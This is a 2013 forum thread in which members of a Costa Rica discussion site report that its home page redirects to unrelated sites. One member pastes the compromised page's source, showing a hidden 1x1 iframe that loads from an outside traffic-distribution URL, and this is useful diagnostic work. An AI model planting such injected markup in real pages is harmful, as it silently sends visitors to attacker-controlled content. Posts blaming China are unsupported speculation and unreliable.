www.CostaRicaTicas.com
https://forum.costaricaticas.com/

Was the CRT URL Hijacked?
https://forum.costaricaticas.com/viewtopic.php?f=1&t=43058		 Page 1 of 3
Author:  Harddrive43228 [ Fri Mar 15, 2013 10:48 am ]
Post subject:  Was the CRT URL Hijacked?
I entered www.costaricaticas.com in my browser and it took me to a chinese soft porn site. If I enter the full forum url, all is OK.

Anyone else have any issues?
Author:  Farmer1 [ Fri Mar 15, 2013 12:38 pm ]
Post subject:  Re: Was the CRT URL Hijacked?
yep
Author:  Isra123 [ Fri Mar 15, 2013 12:57 pm ]
Post subject:  Re: Was the CRT URL Hijacked?
I could not get in through my browser bookmark. It goes to a Chinese porn site.
I went to google and clicked on Forum and got on just now.
The costaricatica URL takes you to the Chinese porn site.
Admin should know by now.
Author:  LAdiablo [ Fri Mar 15, 2013 1:22 pm ]
Post subject:  Re: Was the CRT URL Hijacked?
same here. someone is attacking this site.
Author:  DGD [ Fri Mar 15, 2013 1:35 pm ]
Post subject:  Re: Was the CRT URL Hijacked?
Same if when you are within CRT site, you click on "CRT Home Page", takes you to China.
Author:  Zunbake3 [ Fri Mar 15, 2013 1:57 pm ]
Post subject:  Re: Was the CRT URL Hijacked?
Same problem here, had to go an indirect route or the chinese site came up. maybe the first shot in WWIII Cyber War! A day that will live in CRT Infamy!

FDR Zunbake
Author:  Lollypop54 [ Fri Mar 15, 2013 2:34 pm ]
Post subject:  Re: Was the CRT URL Hijacked?
IMO, it was definitely an intentional (Hijack or whatever it was) and probably from China as it appeared to be a Chinese site that I was redirected to.

Couldn't have been the browser or the cache on the computer as I tried three different ones with same results.

Wasn't the DNS either as all other sites resolved without any redirection whatsoever.

Lolly
Author:  DGD [ Fri Mar 15, 2013 2:37 pm ]
Post subject:  Re: Was the CRT URL Hijacked?
See that, and everyone was ready to blame ..............................................(insert your personal likely suspect)

I'll give this to the Chino's, aside from high value targets to cyber attack like banks, they know what websites like CRT are treasures.
Author:  Devo [ Fri Mar 15, 2013 3:27 pm ]
Post subject:  Re: Was the CRT URL Hijacked?
Anyone who got redirected should do a malware scan of their PC.
Author:  Scuba1 [ Fri Mar 15, 2013 4:44 pm ]
Post subject:  Re: Was the CRT URL Hijacked?
I PM'd Admin this AM - same thing happened to me - seems to be working fine now
Author:  Irish Drifter [ Fri Mar 15, 2013 5:13 pm ]
Post subject:  Re: Was the CRT URL Hijacked?
Devo wrote:
Anyone who got redirected should do a malware scan of their PC.


I did and nothing was found.
Author:  BhueyXXXVII [ Sat Mar 16, 2013 8:40 am ]
Post subject:  Re: Was the CRT URL Hijacked?
I am able to get to the forum (obviously), but trying the main page takes me to Chinese porn yesterday, and some K*ds web page today. The main page trys to come up, but the the re-direct.

Seems to me like the main page has definitely been hacked.

And this is from an iPad.
Author:  D2864 [ Sun Mar 17, 2013 10:04 pm ]
Post subject:  Re: Was the CRT URL Hijacked?
i'm looking at the site from chrome and firefox and can see a 1x1 iframe inserted in top left corner of crt home page.

even in ie i can see it. this is where, i think, some rogue code is being executed. notice that there are two very small things in left upper corner and notice the red portion in the middle of the page is dropped down from the top. margins (see below) are set to zero so no reason for this red part to be down some.

margins:
margin-left: 0px;
margin-top: 0px;
margin-right: 0px;
margin-bottom: 0px;



i looked at the page source of the iframe and found this:
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html>
<!-- InstanceBegin template="/Templates/template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head></head><body><iframe width="1" height="1" src="http://easibusiness.com/jake/tds/index.php?out=1362571882" border="0">
</iframe><script type="text/javascript" src="Scripts/swfobject_modified.js"></script>
<!-- InstanceEndEditable -->
<meta content="text/html; charset=iso-8859-1" http-equiv="Content-Type"></meta><style type="text/css"></style><style type="text/css"></style><link type="text/css" rel="stylesheet" href="estilo.css"></link><script type="text/JavaScript" language="JavaScript"></script><script type="text/javascript" src="Scripts/AC_RunActiveContent.js"></script><iframe width="1" height="1" src="http://easibusiness.com/jake/tds/index.php?out=1362571882" border="0"></iframe><table class="formframe" width="750" cellspacing="0" cellpadding="0" border="0" align="center"></table></body>
<!-- InstanceEnd -->
</html>


from above code: this is just blank page but another one with javascript link:
http://easibusiness.com/jake/tds/index. ... 1362571882

the above easibusiness.. never know what that javascript is doing.


it would take a lot of time to get to the bottom of it all.

there is a page https://costaricaticas.com/talk.html on the server which points to javascript cpv.jsp that is, i think, not supposed to be there.... if you look at the talk page, it says just "talk to me" only. i think someone, somewhere is able to update this page with any sort of javascript they choose.

enough said really. i think the home page is being changed at will, but it could be from anywhere internal or external. very difficult to know from where i sit. this was just a quick 40 minute look at it... on the surface, doesn't seem right.
Author:  D2864 [ Sun Mar 17, 2013 10:15 pm ]
Post subject:  Re: Was the CRT URL Hijacked?
one other thing, that cpv.jsp script, my virus software alerted on it and i had my cache cleared recently, btw.
Author:  Sauceman2015 [ Mon Mar 18, 2013 9:44 am ]
Post subject:  Re: Was the CRT URL Hijacked?
Same issue here. I tried 3 browsers all with the same effect. Didn't know everyone else was having problems. Looks like it's good to go.
Page 1 of 3 All times are UTC - 5 hours [ DST ]
Powered by phpBB® Forum Software © phpBB Group
https://www.phpbb.com/